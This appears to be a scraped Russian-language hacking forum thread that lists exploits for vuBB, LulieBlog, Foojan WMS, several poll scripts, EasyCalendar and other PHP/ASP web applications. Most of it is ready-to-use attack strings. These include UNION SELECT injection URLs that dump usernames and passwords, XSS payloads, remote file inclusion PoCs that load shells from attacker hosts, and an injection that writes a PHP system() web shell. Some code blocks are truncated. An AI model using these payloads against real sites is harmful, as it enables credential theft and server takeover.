![]() |
Уязвимости в vuBB
Vendor: http://www.vubb.com/
vuBB alpha RC1 SQL Injection Код:
http://host/forum/index.php?act=viewforum&f=[SQL] В профиле пользователя содержимое многих полей не фильтруется. Атакующий может выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Passive XSS Код:
http://www.example.com/forum/index.php?act=newreply&t='>%3CIFRAME%Код:
http://www.example.com/forum/index.php?act=viewforum&f='Remote SQL Injection (cookies) http://milw0rm.com/id.php?id=1543 Index.PHP SQL Injection Vulnerability http://www.securityfocus.com/vulnerabilities/exploits/vubb_sql_exploit.pl vuBB <= 0.2.1 SQL Injection, XSS, CRLF Injection, Full Path Disclosure Код:
#!/usr/bin/perl |
LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability
Vendor: http://sourceforge.net/project/platformdownload.php?group_id=204083
Remote SQL Injection Vulnerable: LulieBlog Version 1.02 Exploit: Код:
http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/* |
Foojan WMS 1.0 Remote Sql Injection
Vendor: http://www.iranscripts.com/download/Foojan-WMS1.0%20Full.rar
Remote Sql Injection Vulnerable: Foojan WMS 1.0 Exploit: Код:
http://Sitename/index.php?story=1%27union/**/select/**/0,concat(0x55736572203a20,UserName,0x202b2050617373776f7264203a,PassWord),2,3,4,5,6,7,8/**/from/**/authors/* |
WSN Guest 1.21 Version Comments.PHP “ID” SQL Injection
SQL Injection
Vulnerable: WSN Guest 1.21 Exploit: Код:
-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/* |
Tiger PHP News System SQL Injection
Vendor: http://tpns.k-na.se/
SQL Injection Vulnerable: probably all:) Exploit: Код:
http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20fr |
The Everything Development System <= Pre-1.0 SQL Injection
Exploit: http://milw0rm.com/exploits/5037 BookmarkX script 2007 (topicid) Remote SQL Injection Exploit: http://milw0rm.com/exploits/5040 BlogPHP v.2 (id) XSS / Remote SQL Injection Exploit: http://milw0rm.com/exploits/5042 //(с)вежачок от milw0rm.com |
[..::Уязвимости скриптов голосования::..]
Nabopoll 1.2 Vendor: www.nabocorp.com/nabopoll/ Blind SQL Injection Exploit: PHP код:
PoC: Код:
http://www.site.com/[path]/survey.inc.php?path=http://shell.txt?Код:
http://target/nabopoll/admin/config_edit.php*** PollMentor v2.0 Vendor: http://www.aspindir.com/indir.asp?id=4406 PoC: Код:
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--*** Advanced Poll <= 2.0.5 Vulnerable: Advanced Poll 2.0.0 >= 2.0.5 Remote Code Execution Exploit: Код:
#!/usr/bin/perl -wExploit: Код:
#!/usr/bin/perl -wVulnerable: Advanced Poll 2.0.2 PoC: Код:
http://www.example.com/[path_advanced_poll]/admin/common.inc.php?base_path=http:www.example.com*** Flipper Poll v1.1.0 Vendor: http://sourceforge.net/project/showfiles.php?group_id=59828 RFI PoC: Код:
/poll.php?root_path=evilscripts?*** Vote-Pro 4.0 Vendor: http://www.vote-pro.com/ Remote Code Execution Exploit: Код:
use IO::Socket;*** LunarPoll 1.0 Vendor: http://dexxaboy.com/scripts/lunarpoll/download/ RFI PoC: Код:
show.php?PollDir=http://attacker.txt?*** cwmVote 1.0 Vendor: http://explorer.cwm-design.de/dirs/41/cwmVote.rar RFI PoC: Код:
http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]*** Absolute Poll Manager Vendor: http://www.xigla.com/absolutepm/ XSS Vulnerable: XIGLA SOFTWARE Absolute Poll Manager XE 4.1 PoC: Код:
http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script>*** PHPCentral Poll Script Vendor: http://www.phpcentral.org/scripts.php Remote Command Execution Vulnerable: PHPCentral Poll Script v1.0 PoC: Код:
http://www.example.com/poll.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&*** X-Scripts X-Poll SQL Injection PoC: Код:
http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO*** Comdev Vote Caster Vendor: http://www.comdevweb.com/votecaster.php SQL Injection Vulnerable: Comdev VoteCaster 3.1 PoC: Код:
http://www.example.com/index.php?pageaction=results&campaign_id=[SQL]*** AzDGVote RFI PoC: Код:
http://www.example.com/poll/view.php?int_path=http://attacker*** |
4images 1.7.6
Active XSS 4images 1.7.6 Скорей всего и ранние версии 1 В настройках профиля(Control Panel)в поле Homepage: PHP код:
2 В поле Description: PHP код:
ыы первая бага найденая мной :D |
wow-ultimate; версии: все.
/rename.php Код:
//Проверка аккаунтадефолтные пути: Код:
Z:\home\[serverip]\www\/usr/home/server/ dreammangos: версии (?) пхп иньекции в компонентах /media/addgalwall.php /media/addgalscreen.php (компоненты дефолтные) нет проверки на расширения файлов. /ps не забудте сделать вайп :) Цитата:
|
EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities
------------------------------- HomePage: http://myiosoft.com Exploit: Multiple Remote Vulnerabilities [High] Verified in localhost with EsayCalendar 4.0tr and magic_quotes Off Remote SQL Injection: Vuln File: calendar_backend.php Exploit: PHP код:
PHP код:
Blind SQL Injection: Vuln File: ajaxp_backend.php Exploit: PHP код:
PHP код:
Cross Site Scripting: Vuln File: calendar_backend.php Exploit: PHP код:
PHP код:
EasyGallery 5.00tr возможно более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения. 1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "catid" в сценарии staticpages/easygallery/index.php (когда параметр "page" установлен в значение "category"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: PHP код:
URL производителя: myiosoft.com/?1.9.0.0 Решение: Способов устранения уязвимости не существует в настоящее время. ============================================= |
| Время: 06:09 |